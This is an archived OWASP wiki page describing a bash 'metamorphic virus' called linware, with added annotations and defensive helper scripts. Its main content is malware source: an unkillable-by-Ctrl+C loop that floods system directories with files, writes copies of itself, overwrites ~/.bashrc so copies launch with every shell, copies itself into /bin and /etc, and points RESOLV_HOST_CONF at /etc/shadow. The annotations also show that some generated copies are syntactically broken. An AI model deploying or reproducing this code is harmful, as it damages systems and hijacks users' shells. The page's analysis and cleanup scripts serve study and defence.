This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Metamorphic Virology

From OWASP

Revision as of 23:13, 6 March 2013

Rudimentary Metamorphic Virology
By Gregory Disney-Leugers

Download at: https://docs.google.com/a/owasp.org/file/d/0B3OSDccoP1KhbVkzWE1TZ3hSS0k/edit?usp=sharing

Virology should be viewed as evolutionary biology applied to code. To demonstrate this I wrote a bash script. The script is metamorphic in the sense that it is self-modifying and self-propagating, and it covers the three main attributes of metamorphic virology: the methods of survival, reproduction, and exploitation.

Survival:

 #!/bin/bash
 trap '' INT       # ignore SIGINT so that Ctrl+C cannot stop the script
 for (( ; ; ))     # endless loop; its body is shown in the following excerpts
 do

The trap '' INT line makes the shell ignore SIGINT, so once the script is running Ctrl+C cannot stop it (the empty action string '' is what ignores the signal; a bare "trap INT" would instead reset SIGINT to its default disposition). The loop in the second and third lines never terminates. Normally a long-running loop like this would record its PID, for example in a pidfile, so that it could be stopped later; this script records none, to aid its survival. Only SIGINT is ignored, though: the process still dies to SIGTERM, and SIGKILL cannot be trapped at all, so once the PID is found (for example with pgrep -f) a plain kill or kill -9 ends it.
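The following is an added example, not part of the author's script, that checks the survival claim above and its limit: a throwaway child ignores SIGINT and loops forever, we send it SIGINT and confirm it survives, then send SIGTERM and confirm it dies. It assumes a Linux/Unix host with bash, kill(1) and a sleep(1) that accepts fractional seconds.

```shell
#!/bin/bash
# Added example (not from the original page): what "trap '' INT" does and does
# not protect against. Assumes bash, kill(1) and a sleep(1) that takes fractions.

# Report whether a PID still exists: "alive" or "dead".
pid_state() {
    if kill -0 "$1" 2>/dev/null; then echo alive; else echo dead; fi
}

# Start a SIGINT-ignoring loop, probe it with SIGINT and then SIGTERM,
# and print the two observations as "int:<state> term:<state>".
probe_trap() {
    # Same survival idiom as the page's script, minus the file spam. Output is
    # discarded so that the child does not keep our stdout open.
    bash -c 'trap "" INT; while :; do sleep 0.1; done' >/dev/null 2>&1 &
    pid=$!
    sleep 0.3                             # let the child install its trap

    kill -s INT "$pid" 2>/dev/null || true
    sleep 0.5
    after_int=$(pid_state "$pid")         # SIGINT is ignored: still alive

    kill -s TERM "$pid" 2>/dev/null || true
    wait "$pid" 2>/dev/null || true       # reap it; exit status 143 is expected
    after_term=$(pid_state "$pid")        # SIGTERM is not trapped: dead

    echo "int:$after_int term:$after_term"
}

probe_trap
```

Run it as an ordinary user; it prints int:alive term:dead. The same two-step probe (SIGINT, then SIGTERM or SIGKILL) is the practical way to confirm that a stuck copy is only ignoring Ctrl+C rather than surviving kill.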


Reproduction:

  #!/bin/bash
  export RESOLV_HOST_CONF=/etc/shadow   # present in the original; nothing below reads it
  trap '' INT                            # ignore SIGINT, as in the survival excerpt
  for (( ; ; ))                          # endless loop; the body continues in the next excerpt
  do
  # Each name is <own basename>.<random 0-32767>. and "> $FILE" creates the file
  # empty (or truncates it). /var, /etc, /run and /root are only writable as root.
  FILE="/tmp/$(basename $0).$RANDOM."
  echo $FILE
  > $FILE
  FILES="/var/$(basename $0).$RANDOM."
  echo $FILES
  > $FILES
  FILEZ="/etc/$(basename $0).$RANDOM."
  echo $FILEZ
  > $FILEZ
  FILE="/tmp/$(basename $0).$RANDOM."
  echo $FILE
  > $FILE
  FILES="/var/$(basename $0).$RANDOM."
  echo $FILES
  > $FILES
  FILEZ="/etc/$(basename $0).$RANDOM."
  echo $FILEZ
  > $FILEZ
  FILER="/run/$(basename $0).$RANDOM."
  echo $FILER
  > $FILER
  FILEQ="/root/$(basename $0).$RANDOM."
  echo $FILEQ
  > $FILEQ

The script now loops, creating empty files: seven per iteration, as fast as the shell can go, since there is no sleep. Each name is the script's own basename ($(basename $0)) followed by a value of $RANDOM (0 to 32767) and a trailing dot, so the names change every iteration, and the redirection "> $FILE" creates the file empty or truncates it if it already exists. Two things follow from this: the spam is bounded to 32768 names per directory, after which the loop only re-truncates existing files, and writing into /etc, /var, /run and /root only works when the script runs as root; as an ordinary user only the /tmp files appear.

  # Each $RANDOM expands separately, so the chmod target, the cat target and the
  # exec target at the end are three different names. chmod succeeds only once an
  # earlier iteration happened to create this name in /root; until then the &&
  # short-circuits and nothing is written.
  cd /root && chmod u+x /root/$(basename $0).$RANDOM. &&
  # FSS is unquoted: every $(...), $RANDOM and $i in the body is expanded now,
  # by the parent, so the copy gets fixed names and numbers.
  cat >~/$(basename $0).$RANDOM. <<FSS
  #!/bin/bash
  trap '' INT
  for (( ; ; ))
  do
  FILE="/tmp/$(basename $0).$RANDOM."
  echo $FILE
  > $FILE
  FILES="/var/$(basename $0).$RANDOM."
  echo $FILES
  > $FILES
  FILEZ="/etc/$(basename $0).$RANDOM."
  echo $FILEZ
  > $FILEZ
  FILE="/tmp/$(basename $0).$RANDOM."
  echo $FILE
  > $FILE
  FILES="/var/$(basename $0).$RANDOM."
  echo $FILES
  > $FILES
  FILEZ="/etc/$(basename $0).$RANDOM."
  echo $FILEZ
  > $FILEZ
  FILER="/run/$(basename $0).$RANDOM."
  echo $FILER
  > $FILER
  FILEQ="/root/$(basename $0).$RANDOM."
  echo $FILEQ
  > $FILEQ
  # ssh to a host named "lt"; its stderr lands in yet another random file.
  ssh lt 2>/tmp/$(basename $0).$RANDOM.
  # In the copy the awk programs become {print <number>}, printing that number once per input line.
  cat /tmp/$(basename $0).$RANDOM.|awk -F"\`" {'print   $RANDOM'}|awk -F"\'" {'print $RANDOM'}
  while /bin/true ; do
    # $i is expanded (to nothing) when the parent writes the copy.
    for i in $(basename $0)/* ; do
      if [ -w $i -a -c $i -a $i != $RANDOM ]; then
        cat $RANDOM > $i
      fi
    done
  done
  # Hand off to another random name; not reachable while the while loop above runs.
  exec ~/$(basename $0).$RANDOM.
  FSS

Using cat, the files are now written with that expanded payload; everything from the first FSS to the second FSS is one output file. Below is what such a copy looks like:
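The following is an added example, not code from the page, that isolates the mechanism behind the expanded copy: the same two-line template written once with an unquoted here-document delimiter (as the page does) and once with a quoted one. The template body is a harmless stand-in that only echoes a name; the file names and the count_dollar_lines check are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original page): why the written copy comes out
# with numbers baked in. "cat > file <<FSS" with an unquoted FSS expands $RANDOM,
# $(basename $0) and friends in the writer; 'FSS' would copy the text verbatim.

# Unquoted delimiter: every $ in the template is expanded while writing.
# The "echo $name" line therefore carries the writer's (unset) $name, i.e. nothing.
write_expanded() {
    cat > "$1" <<FSS
#!/bin/sh
name="/tmp/$(basename "$0").$RANDOM."
echo $name
FSS
}

# Quoted delimiter: the copy receives the template exactly as written.
write_literal() {
    cat > "$1" <<'FSS'
#!/bin/sh
name="/tmp/$(basename "$0").$RANDOM."
echo $name
FSS
}

# How many lines of a file still contain a shell expansion ("$").
count_dollar_lines() {
    grep -c '\$' "$1" || true
}

# Run a copy with sh and return what it prints.
run_copy() {
    sh "$1"
}

d=$(mktemp -d)
write_expanded "$d/expanded"
write_literal  "$d/literal"
echo "expanded copy: $(count_dollar_lines "$d/expanded") lines with \$, prints '$(run_copy "$d/expanded")'"
echo "literal copy:  $(count_dollar_lines "$d/literal") lines with \$, prints '$(run_copy "$d/literal")'"
rm -rf "$d"
```

The expanded copy keeps no expansion at all and prints an empty line, because the writer's $name was unset when it was written; the literal copy keeps both $ lines and prints a name built from its own basename when run. The page's child (below) is the first case, with the parent's values frozen into it.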

 #!/bin/bash
 trap '' INT
 for (( ; ; ))
 do
 # The assignments carry fresh numbers, but the echo and redirect lines carry the
 # parent's value of $FILE (etc.) at write time, hence the different numbers.
 FILE="/tmp/linware.3861."
 echo /tmp/linware.21415.
 > /tmp/linware.21415.
 FILES="/var/linware.19561."
 echo /var/linware.10574.
 > /var/linware.10574.
 FILEZ="/etc/linware.1020."
 echo /etc/linware.16689.
 > /etc/linware.16689.
 FILE="/tmp/linware.21532."
 echo /tmp/linware.21415.
 > /tmp/linware.21415.
 FILES="/var/linware.8989."
 echo /var/linware.10574.
 > /var/linware.10574.
 FILEZ="/etc/linware.27934."
 echo /etc/linware.16689.
 > /etc/linware.16689.
 FILER="/run/linware.1029."
 echo /run/linware.2459.
 > /run/linware.2459.
 FILEQ="/root/linware.29530."
 echo /root/linware.21523.
 > /root/linware.21523.
 exec ~/linware.18402.
 ssh lt 2>/tmp/linware.14894.
 cat /tmp/linware.24609.|awk -F"`" {'print   12002'}|awk -F"\'" {'print 12646'}
 while /bin/true ; do
   # $i was expanded to nothing by the parent's here-document: the test below is
   # no longer a valid expression and the cat redirection has no target.
   for i in linware/* ; do
     if [ -w  -a -c  -a  != 13866 ]; then
       cat 1915 >
     fi
   done
 done
 exec ~/linware.14617.

This is a sample of the output script's own output; at the end it execs yet another output script. The hard-coded names form a chain, each copy naming the next, which can be used to map the propagation of the malware. Note what the expansion did to the inner loop: $i became empty, leaving "[ -w -a -c -a != 13866 ]" and a redirection with no target ("cat 1915 >"); bash rejects the latter as a syntax error when it parses the enclosing loop, so a copy in exactly this form does not run its loop at all.
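Mapping the propagation from the exec chain, as suggested above, can be automated. The following is an added example, not code from the page: it builds a scratch directory of constructed copies that follow the page's naming pattern (the names linware.18402., linware.14617. and linware.1029. are taken from the sample above, but their contents here are made up), then follows each copy's "exec ~/<name>" line to the next file, stopping on a missing hop or a cycle. The function names are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original page): follow the "exec ~/<name>" hand-offs
# between dropped copies to reconstruct the order in which they were spawned.
# All files below are constructed for this example, not real droppings.

# Build a scratch directory with three constructed copies and two empty droppings;
# print its path.
make_sample_tree() {
    dir=$(mktemp -d)
    printf '#!/bin/bash\ntrap "" INT\nexec ~/linware.14617.\n' > "$dir/linware.18402."
    printf '#!/bin/bash\ntrap "" INT\nexec ~/linware.1029.\n'  > "$dir/linware.14617."
    printf '#!/bin/bash\ntrap "" INT\nexec ~/linware.18402.\n' > "$dir/linware.1029."   # loops back
    : > "$dir/linware.3861."      # empty files, as left by the page's "> $FILE" lines
    : > "$dir/linware.21415."
    echo "$dir"
}

# Print the name a copy hands off to with "exec ~/<name>" (last one wins), or nothing.
next_hop() {
    sed -n 's/^[[:space:]]*exec[[:space:]]*~\/\([^[:space:]]*\).*/\1/p' "$1" | tail -n 1
}

# Follow the exec chain starting at $2 inside directory $1. Stops when a hop's file
# is missing (its cat target never matched the exec target's $RANDOM) or when the
# chain loops back on itself.
map_chain() {
    dir=$1; cur=$2; seen=" "; out=""
    while [ -n "$cur" ]; do
        case "$seen" in
            *" $cur "*) out="$out -> (loops back to $cur)"; break ;;
        esac
        seen="$seen$cur "
        out="${out:+$out -> }$cur"
        if [ ! -f "$dir/$cur" ]; then out="$out (missing)"; break; fi
        cur=$(next_hop "$dir/$cur")
    done
    printf '%s\n' "$out"
}

# Count files in $1 that match the page's naming pattern, scripts and empty droppings alike.
count_droppings() {
    n=0
    for f in "$1"/linware.[0-9]*.; do
        if [ -f "$f" ]; then n=$((n + 1)); fi
    done
    echo "$n"
}

d=$(make_sample_tree)
map_chain "$d" linware.18402.
echo "$(count_droppings "$d") files match the pattern"
rm -rf "$d"
```

On a real host the same two functions would be pointed at the home directory (where the page's cat writes the copies) with the basename of the original script in place of linware; the empty droppings in /tmp, /var, /etc, /run and /root match the same pattern and are the quickest indicator that the loop ran at all.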

Exploitation:

 # The here-document redirection overwrites ~/.bashrc, so the file ends up holding
 # only these four paths; each starts a copy on every interactive bash start-up.
 cat >~/.bashrc <<ASS
 /opt/linware
 /bin/linware
 /etc/linware
 /run/linware
 ASS
 cp /opt/linware /bin      # spread the copy (requires root)
 cp /opt/linware /etc
 exec /opt/linware         # replaces this process; the next line is never reached
 exec ~/$(basename $0).$RANDOM

Using cat once again, the script writes ~/.bashrc; since the here-document redirection overwrites rather than appends, the file now consists of the four paths, and every new interactive bash runs a copy on start-up. This infects bash itself to ensure survival. The cp lines (which need root) spread the copy from /opt into /bin and /etc, and at the end of the loop body the script execs /opt/linware, which starts the whole process over; the final exec of the random-named copy is never reached, because exec has already replaced the process. Because each copy loops forever, an infected user's interactive shells hang before they show a prompt; "bash --norc" starts an interactive shell without reading ~/.bashrc, which is the simplest way to get a prompt back while cleaning up.
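Auditing an rc file for this kind of persistence is straightforward, because the injected lines are unlike anything a legitimate ~/.bashrc contains. The following is an added example, not code from the page: it writes a constructed ~/.bashrc with a few normal lines plus the four injected paths, flags every line that is nothing but a bare absolute path (optionally behind "exec"), and rewrites the file without them, keeping a backup. The indicator pattern, the sample file and the function names are assumptions of this example.

```shell
#!/bin/sh
# Added example (not from the original page): find and strip bare-path lines
# like "/opt/linware" from an rc file. The rc file is constructed for this example.

# A line that is nothing but an absolute path, optionally exec'd, is the page's signature.
INDICATOR='^[[:space:]]*(exec[[:space:]]+)?/[^[:space:]]+[[:space:]]*$'

# Write a constructed rc file: normal content followed by the four injected lines.
write_sample_bashrc() {
    cat > "$1" <<'EOF'
# ~/.bashrc (constructed sample)
[ -z "$PS1" ] && return
alias ll='ls -l'
export PATH="$HOME/bin:$PATH"
/opt/linware
/bin/linware
/etc/linware
/run/linware
EOF
}

# Print the offending lines with their line numbers (empty output when the file is clean).
suspicious_rc_lines() {
    grep -nE "$INDICATOR" "$1" || true
}

# Count them; grep -c prints 0 when nothing matches.
count_suspicious() {
    grep -cE "$INDICATOR" "$1" || true
}

# Keep a backup beside the file and rewrite it without the injected lines.
clean_rc() {
    cp "$1" "$1.bak"
    grep -vE "$INDICATOR" "$1.bak" > "$1" || true
}

d=$(mktemp -d)
write_sample_bashrc "$d/.bashrc"
echo "before:"
suspicious_rc_lines "$d/.bashrc"
clean_rc "$d/.bashrc"
echo "after: $(count_suspicious "$d/.bashrc") suspicious lines left; backup in $d/.bashrc.bak"
rm -rf "$d"
```

Review the flagged lines before cleaning rather than trusting the pattern blindly: a bare path is unusual in an rc file but not impossible, and the backup exists so that a false positive can be restored. Cleaning the rc file alone is not enough, since the copies in /opt, /bin, /etc and /run and the running processes remain; kill those first (see the survival notes above), then restore the file.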

https://docs.google.com/a/owasp.org/file/d/0B3OSDccoP1KhbVkzWE1TZ3hSS0k/edit?usp=sharing

WARNING: this script should only be used in a controlled environment such as a VM.

WARNING: this script should be considered malicious.